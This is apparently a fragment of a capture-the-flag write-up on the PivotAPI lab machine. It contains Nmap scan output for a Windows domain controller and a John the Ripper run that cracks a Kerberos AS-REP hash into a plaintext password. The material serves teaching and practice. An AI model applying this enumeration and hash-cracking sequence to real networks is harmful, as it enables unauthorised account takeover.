Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-13 10:17 CST Nmap scan report for 10.10.10.240 Host is up (0.069s latency). Not shown: 986 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 02-19-21 03:06PM 103106 10.1.1.414.6453.pdf | 02-19-21 03:06PM 656029 28475-linux-stack-based-buffer-overflows.pdf | 02-19-21 12:55PM 1802642 BHUSA09-McDonald-WindowsHeap-PAPER.pdf | 02-19-21 03:06PM 1018160 ExploitingSoftware-Ch07.pdf | 08-08-20 01:18PM 219091 notes1.pdf | 08-08-20 01:34PM 279445 notes2.pdf | 08-08-20 01:41PM 105 README.txt |_02-19-21 03:06PM 1301120 RHUL-MA-2009-06.pdf | ftp-syst: |_ SYST: Windows_NT 22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0) | ssh-hostkey: | 3072 fa:19:bb:8d:b6:b6:fb:97:7e:17:80:f5:df:fd:7f:d2 (RSA) | 256 44:d0:8b:cc:0a:4e:cd:2b:de:e8:3a:6e:ae:65:dc:10 (ECDSA) |_ 256 93:bd:b6:e2:36:ce:72:45:6c:1d:46:60:dd:08:6a:44 (ED25519) 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-05-13 02:18:50Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: LicorDeBellota.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM | ms-sql-ntlm-info: | Target_Name: LICORDEBELLOTA | NetBIOS_Domain_Name: LICORDEBELLOTA | NetBIOS_Computer_Name: PIVOTAPI | DNS_Domain_Name: LicorDeBellota.htb | DNS_Computer_Name: PivotAPI.LicorDeBellota.htb | DNS_Tree_Name: LicorDeBellota.htb |_ Product_Version: 10.0.17763 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2021-05-13T02:14:57 |_Not valid after: 2051-05-13T02:14:57 |_ssl-date: 2021-05-13T02:19:40+00:00; 0s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: LicorDeBellota.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped Service Info: Host: PIVOTAPI; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: | ms-sql-info: | 10.10.10.240:1433: | Version: | name: Microsoft SQL Server 2019 RTM | number: 15.00.2000.00 | Product: Microsoft SQL Server 2019 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2021-05-13T02:19:03 |_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 105.85 seconds
➜ Desktop sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt [sudo] password for miao: Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status Roper4155 ($krb5asrep$Kaorz@LICORDEBELLOTA.HTB) 1g 0:00:00:16 DONE (2021-05-12 19:22) 0.06157g/s 657024p/s 657024c/s 657024C/s Roryarthur..Ronald8 Use the "--show" option to display all of the cracked passwords reliably Session completed